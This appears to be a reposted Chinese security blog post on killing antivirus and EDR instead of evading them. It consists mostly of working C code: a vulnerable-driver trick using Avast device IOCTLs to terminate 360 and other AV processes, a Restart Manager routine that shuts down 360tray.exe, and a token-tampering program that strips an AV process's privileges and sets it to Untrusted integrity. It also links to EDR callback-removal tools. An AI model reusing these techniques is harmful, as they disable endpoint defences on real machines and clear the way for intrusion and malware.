能关闭防病毒软件干嘛要做免杀呢

admin 2024年2月24日02:01:12评论32 views字数 7113阅读23分42秒阅读模式

如题

能关闭防病毒软件干嘛要做免杀呢

视频链接:https://www.bilibili.com/video/BV1Kx4y1f7CK/?spm_id_from=333.999.0.0

驱动Kill参考
HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 process = { sizeof(PROCESSENTRY32) };
WCHAR process_name7[MAX_PATH] = { TEXT("ZhuDongFangYu.exe") };

HANDLE a = CreateFileA(
"\\.\aswSP_ArPot2",
GENERIC_READ | GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
0);
int InBuffer = 0;
DWORD BytesReturned = NULL;
DeviceIoControl(a, 0x7299C004, &InBuffer, 4, 0, 0, &BytesReturned, 0);
HANDLE aa = CreateFileW(L"\\.\aswSP_Avar", GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
0);
while (Process32Next(hProcessSnap, &process)) {
/*printf("%wsrn", process.szExeFile);*/
if (WcharIf(process_name1, process.szExeFile) || WcharIf(process_name2, process.szExeFile) || WcharIf(process_name3, process.szExeFile) ||
WcharIf(process_name4, process.szExeFile) || WcharIf(process_name5, process.szExeFile) || WcharIf(process_name6, process.szExeFile)
) {

DeviceIoControl(aa, 0x9988C094, &process.th32ProcessID, 4, 0, 0, &BytesReturned, 0);

}
}
移除回调

win64 HOOK SSDT   kpp patchguard  回调

https://github.com/br-sn/CheekyBlinder

https://github.com/uf0o/windows-ps-callbacks-experiments/tree/master/edr-driver

https://github.com/lawiet47/STFUEDR

BYOD

阻止流量出站

https://www.wangan.com/p/11v8239694f8fe03

R3terminate

滥用

https://learn.microsoft.com/en-us/windows/win32/rstmgr/restart-manager-portal

https://www.crowdstrike.com/blog/windows-restart-manager-part-1/

#include <windows.h>
#include <RestartManager.h>
#include <stdio.h>
#pragma comment(lib,"Rstrtmgr.lib")
/*
1.开始一个新的会话,使用 RmStartSession 函数。这将返回一个会话句柄和一个会话密钥。
2.将要管理的文件或进程注册为资源,使用 RmRegisterResources 函数。
3.使用 RmGetList 函数来检索所有与已注册的资源相关的进程信息。这将返回一个包含 RM_PROCESS_INFO 结构的数组,其中包含有关这些进程的详细信息,例如进程 ID 和进程名称。
4.使用 RmShutdown 函数来关闭所有与已注册的资源相关的进程。这将使这些进程在关闭时执行一个安全的关闭过程,以确保数据的一致性和完整性。
5.最后,使用 RmEndSession 函数来结束会话
*/
int __cdecl wmain(int argc, WCHAR** argv)
{
  DWORD dwSessionHandle = 0xFFFFFFFF;
  WCHAR szSessionKey[CCH_RM_SESSION_KEY + 1] = { 0 };
  DWORD dwError = RmStartSession(&dwSessionHandle, 0, szSessionKey);
  wprintf(L"RmStartSession returned %dn", dwError);
  if (dwError == ERROR_SUCCESS)
  {
      // PCWSTR pszFile = argv[1];
      PCWSTR pszFile = L"D:\360\360Safe\safemon\360tray.exe";
      dwError = RmRegisterResources(dwSessionHandle, 1, &pszFile, 0, NULL, 0, NULL);
      if (dwError == ERROR_SUCCESS)
      {
          DWORD dwReason;
          UINT i;
          UINT nProcInfoNeeded;
          UINT nProcInfo = 100;
          RM_PROCESS_INFO rgpi[100];
          dwError = RmGetList(dwSessionHandle, &nProcInfoNeeded, &nProcInfo, rgpi, &dwReason);

          if (dwError == ERROR_SUCCESS)
          {
              RmShutdown(dwSessionHandle, 0, NULL);
          }
      }
      RmEndSession(dwSessionHandle);
  }
  return 0;
}
降低令牌完整性
#include <Windows.h>
#include <stdio.h>
#include <iostream>
#include <TlHelp32.h>

#include <conio.h>

bool EnableDebugPrivilege()
{
  HANDLE hToken;
  LUID sedebugnameValue;
  TOKEN_PRIVILEGES tkp;
  if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
  {
      return   FALSE;
  }
  if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue))
  {
      CloseHandle(hToken);
      return false;
  }
  tkp.PrivilegeCount = 1;
  tkp.Privileges[0].Luid = sedebugnameValue;
  tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
  if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL))
  {
      CloseHandle(hToken);
      return false;
  }
  return true;
}

int getpid(LPCWSTR procname) {

  DWORD procPID = 0;
  LPCWSTR processName = L"";
  PROCESSENTRY32 processEntry = {};
  processEntry.dwSize = sizeof(PROCESSENTRY32);


  // replace this with Ntquerysystemapi
  HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, procPID);
  if (Process32First(snapshot, &processEntry))
  {
      while (_wcsicmp(processName, procname) != 0)
      {
          Process32Next(snapshot, &processEntry);
          processName = processEntry.szExeFile;
          procPID = processEntry.th32ProcessID;
      }
      printf("[+] Got target proc PID: %dn", procPID);
  }

  return procPID;
}

BOOL SetPrivilege(
  HANDLE hToken,         // access token handle
  LPCTSTR lpszPrivilege, // name of privilege to enable/disable
  BOOL bEnablePrivilege   // to enable or disable privilege
)
{
  TOKEN_PRIVILEGES tp;
  LUID luid;

  if (!LookupPrivilegeValue(
      NULL,           // lookup privilege on local system
      lpszPrivilege,   // privilege to lookup
      &luid))       // receives LUID of privilege
  {
      printf("LookupPrivilegeValue error: %un", GetLastError());
      return FALSE;
  }

  tp.PrivilegeCount = 1;
  tp.Privileges[0].Luid = luid;
  if (bEnablePrivilege)
      tp.Privileges[0].Attributes = SE_PRIVILEGE_REMOVED;
  else
      tp.Privileges[0].Attributes = SE_PRIVILEGE_REMOVED;

  // Enable the privilege or disable all privileges.

  if (!AdjustTokenPrivileges(
      hToken,
      FALSE,
      &tp,
      sizeof(TOKEN_PRIVILEGES),
      (PTOKEN_PRIVILEGES)NULL,
      (PDWORD)NULL))
  {
      printf("AdjustTokenPrivileges error: %un", GetLastError());
      return FALSE;
  }

  if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)

  {
      printf("The token does not have the specified privilege. n");
      return FALSE;
  }

  return TRUE;
}


int main(int argc, char** argv)
{
  LUID sedebugnameValue;
  EnableDebugPrivilege();

  wchar_t procname[80];
  size_t convertedChars = 0;
  mbstowcs_s(&convertedChars, procname, 80, argv[1], _TRUNCATE);

  int pid = getpid(procname);


  // printf("PID %dn", pid);
  printf("[*] Killing AV...n");

  // hardcoding PID of msmpeng for now
  HANDLE phandle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid);

  if (phandle != INVALID_HANDLE_VALUE) {

      printf("[*] Opened Target Handlen");
  }
  else {
      printf("[-] Failed to open Process Handlen");
  }

  // printf("%pn", phandle);

  HANDLE ptoken;

  BOOL token = OpenProcessToken(phandle, TOKEN_ALL_ACCESS, &ptoken);

  if (token) {
      printf("[*] Opened Target Token Handlen");
  }
  else {
      printf("[-] Failed to open Token Handlen");
  }

  LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue);


  TOKEN_PRIVILEGES tkp;

  tkp.PrivilegeCount = 1;
  tkp.Privileges[0].Luid = sedebugnameValue;
  tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

  if (!AdjustTokenPrivileges(ptoken, FALSE, &tkp, sizeof(tkp), NULL, NULL)) {

      printf("[-] Failed to Adjust Token's Privilegesn");
      return 0;
  }


  // Remove all privileges
  SetPrivilege(ptoken, SE_DEBUG_NAME, TRUE);
  SetPrivilege(ptoken, SE_CHANGE_NOTIFY_NAME, TRUE);
  SetPrivilege(ptoken, SE_TCB_NAME, TRUE);
  SetPrivilege(ptoken, SE_IMPERSONATE_NAME, TRUE);
  SetPrivilege(ptoken, SE_LOAD_DRIVER_NAME, TRUE);
  SetPrivilege(ptoken, SE_RESTORE_NAME, TRUE);
  SetPrivilege(ptoken, SE_BACKUP_NAME, TRUE);
  SetPrivilege(ptoken, SE_SECURITY_NAME, TRUE);
  SetPrivilege(ptoken, SE_SYSTEM_ENVIRONMENT_NAME, TRUE);
  SetPrivilege(ptoken, SE_INCREASE_QUOTA_NAME, TRUE);
  SetPrivilege(ptoken, SE_TAKE_OWNERSHIP_NAME, TRUE);
  SetPrivilege(ptoken, SE_INC_BASE_PRIORITY_NAME, TRUE);
  SetPrivilege(ptoken, SE_SHUTDOWN_NAME, TRUE);
  SetPrivilege(ptoken, SE_ASSIGNPRIMARYTOKEN_NAME, TRUE);

  printf("[*] Removed All Privilegesn");


  DWORD integrityLevel = SECURITY_MANDATORY_UNTRUSTED_RID;


  SID integrityLevelSid{};
  integrityLevelSid.Revision = SID_REVISION;
  integrityLevelSid.SubAuthorityCount = 1;
  integrityLevelSid.IdentifierAuthority.Value[5] = 16;
  integrityLevelSid.SubAuthority[0] = integrityLevel;

  TOKEN_MANDATORY_LABEL tokenIntegrityLevel = {};
  tokenIntegrityLevel.Label.Attributes = SE_GROUP_INTEGRITY;
  tokenIntegrityLevel.Label.Sid = &integrityLevelSid;

  if (!SetTokenInformation(
      ptoken,
      TokenIntegrityLevel,
      &tokenIntegrityLevel,
      sizeof(TOKEN_MANDATORY_LABEL) + GetLengthSid(&integrityLevelSid)))
  {
      printf("SetTokenInformation failedn");
  }
  else {

      printf("[*] Token Integrity set to Untrustedn");
  }

  CloseHandle(ptoken);
  CloseHandle(phandle);

}



原文始发于微信公众号(老鑫安全):能关闭防病毒软件干嘛要做免杀呢

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月24日02:01:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   能关闭防病毒软件干嘛要做免杀呢https://cn-sec.com/archives/2521336.html

发表评论

匿名网友 填写信息